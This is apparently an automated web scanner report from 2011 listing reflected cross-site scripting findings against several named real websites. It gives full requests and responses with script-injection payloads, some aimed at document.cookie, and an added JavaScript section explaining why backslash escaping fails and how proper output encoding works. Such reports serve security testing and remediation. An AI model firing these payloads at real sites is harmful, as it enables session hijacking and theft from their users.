This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_lookfe27a<script>alert(1)</script>35aefdde02f&website=&language=&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:36 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 517
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/db/aad_lookfe27a<script>alert(1)</script>35aefdde02f.db at line 206 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a syntax ...[SNIP]...
The value of the language request parameter is copied into the HTML document as plain text between tags. The payload 5027a<script>alert(1)</script>12f2a4bf5c6 was submitted in the language parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=5027a<script>alert(1)</script>12f2a4bf5c6&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:41 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 531
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/language/5027a<script>alert(1)</script>12f2a4bf5c6/template.pl at line 174 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that ...[SNIP]...
The value of the website request parameter is copied into the HTML document as plain text between tags. The payload 39b59<script>alert(1)</script>d0e2bc9f57e was submitted in the website parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=39b59<script>alert(1)</script>d0e2bc9f57e&language=&display_poll_results=on HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:21:40 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 515
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/surveys/websites/39b59<script>alert(1)</script>d0e2bc9f57e.cfg at line 441 in survey.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a synta ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 17c72<script>alert(1)</script>aed7ed93f68 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr17c72<script>alert(1)</script>aed7ed93f68&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 220 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:44 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:44 GMT; Path=/ Set-Cookie: di=%7B%7D..1295460044.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 10:54:33 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 18:00:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 18:00:44 GMT Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b5131<script>alert(1)</script>ac69988ca2e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.wileyrein.com/p.json?callback=_ate.ad.hprb5131<script>alert(1)</script>ac69988ca2e&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.wileyrein.com%2Fjsfe969%252522%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253ec77ca9823dd%2Fui.dialog.js&ref=http%3A%2F%2Fburp%2Fshow%2F5&2lh2lm HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295378586.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 18:00:41 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 18:00:41 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 18:00:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 18:00:41 GMT Connection: close
4.29. http://financaspessoais.blog.br/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://financaspessoais.blog.br
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8184"><script>alert(1)</script>c42c81b1212 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8184\"><script>alert(1)</script>c42c81b1212 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f8184"><script>alert(1)</script>c42c81b1212=1 HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:16 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?f8184\"><script>alert(1)</script>c42c81b1212=1#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff57"><script>alert(1)</script>29569e332da was submitted in the utm_campaign parameter. This input was echoed as aff57\"><script>alert(1)</script>29569e332da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57"><script>alert(1)</script>29569e332da HTTP/1.1 Host: financaspessoais.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:50 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.9 X-Pingback: http://financaspessoais.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 207160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57\"><script>alert(1)</script>29569e332da#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form"> ...[SNIP]...
The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259b8"><script>alert(1)</script>8849500d1f1 was submitted in the utm_content parameter. This input was echoed as 259b8\"><script>alert(1)</script>8849500d1f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8\"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1033"><script>alert(1)</script>f894aad5354 was submitted in the utm_medium parameter. This input was echoed as e1033\"><script>alert(1)</script>f894aad5354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badgee1033"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:02 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badgee1033\"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab23b"><script>alert(1)</script>dbf1985e564 was submitted in the utm_source parameter. This input was echoed as ab23b\"><script>alert(1)</script>dbf1985e564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=bloggerab23b"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=bloggerab23b\"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...
The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45a3"><script>alert(1)</script>2751ef5eaae was submitted in the utm_term parameter. This input was echoed as a45a3\"><script>alert(1)</script>2751ef5eaae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3\"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372 was submitted in the REST URL parameter 1. This input was echoed as 3018b"><img src=a onerror=alert(1)>23dd898c372 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:41 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5920

Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="tools3018b"><img src=a onerror=alert(1)>23dd898c372" class="msie tools">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5 was submitted in the REST URL parameter 1. This input was echoed as f3bd2"><img src=a onerror=alert(1)>edbe5526fa5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:42 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5835

Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolsf3bd2"><img src=a onerror=alert(1)>edbe5526fa5_expose" class="msie tools">
...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71359'%3balert(1)//beeb76ff9a8 was submitted in the h parameter. This input was echoed as 71359';alert(1)//beeb76ff9a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=94699B6&w=160&h=60071359'%3balert(1)//beeb76ff9a8&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:59 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=94699B6&rand=" + myRand;
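The `\"` in the echoed values of the utm_* findings above (and the `\\\"` in finding 4.44 later in this report) is backslash escaping of the kind PHP's addslashes() or magic_quotes applies: it is meaningful inside a PHP or SQL string, but an HTML parser ends a double-quoted attribute at the first `"` whatever precedes it, so the injected tag still lands in the document. The script-context findings against tag.jsp need a different encoder again, and the `'-alert(1)-'` payloads seen elsewhere in this report show that a JavaScript string breakout does not even need `;` or `//`. The following JavaScript is an added illustration, not code from this report or from any of the sites in it: it models the escaping the responses suggest, models how a browser reads the resulting attribute, and contrasts both with a correct per-context encoder. The function names, the `formTag` model of the WordPress form markup, and the payload constants are assumptions made for the example.

```javascript
// Added example: why backslash escaping does not protect an HTML attribute,
// and what correct per-context output encoding looks like. Not from the report.

// PHP addslashes()/magic_quotes-style escaping. The WordPress responses in the
// report echo \" and \\\", which is what this produces once and twice.
function addslashes(s) {
  return s.replace(/[\\'"]/g, (c) => "\\" + c);
}

// Defence for data inside a quoted HTML attribute value: entity-encode every
// character that can end the value or the tag.
function htmlAttrEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Defence for data inside a quoted JavaScript string literal: \uXXXX-encode
// everything that is not alphanumeric, so no quote, backslash, newline, < or /
// reaches either parser ("</script>" inside an inline script ends the script
// element no matter what the JS string state is).
function jsStringEncode(s) {
  return s.replace(/[^A-Za-z0-9]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Browser-side model of a double-quoted attribute: the value runs to the next
// `"`, and a backslash is just another character. Returns the value and the
// markup after it (what the parser goes on to read as new tags).
function parseDoubleQuotedAttr(html, attrName) {
  const start = html.indexOf(attrName + '="');
  if (start === -1) return null;
  const valueStart = start + attrName.length + 2;
  const valueEnd = html.indexOf('"', valueStart);
  return { value: html.slice(valueStart, valueEnd), trailing: html.slice(valueEnd + 1) };
}

// Markup shaped like the report's WordPress form tag (assumed model).
function formTag(utmValue) {
  return '<form action="/?utm_campaign=' + utmValue + '" method="post">';
}

// Payloads of the shapes the scanner used (constructed here).
const ATTR_PAYLOAD = 'aff57"><script>alert(1)</script>29569e332da';
const JS_PAYLOAD = "71359';alert(1)//beeb76ff9a8";
const JS_PAYLOAD_NO_SEMICOLON = "fbc5a'-alert(1)-'5b7885e79b2"; // expression form: no ; or // needed
const SCRIPT_CLOSE_PAYLOAD = "x</script><script>alert(1)</script>";

// Does an attacker-controlled tag follow the action attribute?
function injectedTagFollows(html) {
  const parsed = parseDoubleQuotedAttr(html, "action");
  return parsed !== null && /<script|<img/i.test(parsed.trailing);
}

// Placing the encoded value in a double-quoted literal gives back the original
// (JSON accepts the same \uXXXX escapes as JavaScript).
function jsRoundTrip(s) {
  return JSON.parse('"' + jsStringEncode(s) + '"');
}

function demo() {
  return {
    // HTML attribute context
    rawBreaksOut: injectedTagFollows(formTag(ATTR_PAYLOAD)),
    addslashesBreaksOut: injectedTagFollows(formTag(addslashes(ATTR_PAYLOAD))),               // echoes aff57\"> as in the report
    doubleAddslashesBreaksOut: injectedTagFollows(formTag(addslashes(addslashes(ATTR_PAYLOAD)))), // echoes \\\" as in 4.44
    entityEncodedBreaksOut: injectedTagFollows(formTag(htmlAttrEncode(ATTR_PAYLOAD))),
    // JavaScript string context
    addslashesLeavesScriptClose: /<\/script/i.test(addslashes(SCRIPT_CLOSE_PAYLOAD)),
    jsEncodedIsInert: [JS_PAYLOAD, JS_PAYLOAD_NO_SEMICOLON, SCRIPT_CLOSE_PAYLOAD]
      .every((p) => /^[A-Za-z0-9\\]*$/.test(jsStringEncode(p))),
  };
}
```

`demo()` returns `true` for the three attribute-context break-outs that use raw, once-escaped and twice-escaped input, and `false` for the entity-encoded one; for the script context it shows that addslashes passes `</script>` through untouched while the \uXXXX form contains nothing but alphanumerics and backslashes yet still round-trips to the original value.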
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91eec"%3balert(1)//b86b5220098 was submitted in the pid parameter. This input was echoed as 91eec";alert(1)//b86b5220098 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=94699B691eec"%3balert(1)//b86b5220098&w=160&h=600&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:54 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=94699B691eec";alert(1)//b86b5220098&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 255f6'%3balert(1)//86e0057d261 was submitted in the w parameter. This input was echoed as 255f6';alert(1)//86e0057d261 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=94699B6&w=160255f6'%3balert(1)//86e0057d261&h=600&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:56 GMT
Connection: close

var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=94699B6&rand=" + myRand;
4.40. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jonesdaydiversity.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a088d<script>alert(1)</script>e11cd877bb9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=K08784a088d<script>alert(1)</script>e11cd877bb9&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=...[SNIP]...; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=...[SNIP]...; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 19 Jan 2011 18:01:06 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 20 Jan 2011 18:01:06 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 19 Jan 2011 18:01:05 GMT
Content-Length: 128

/*
 * JavaScript include error:
 * The customer code "K08784A088D<SCRIPT>ALERT(1)</SCRIPT>E11CD877BB9" was not recognized.
 */
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed76e'-alert(1)-'ef86bc64d25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
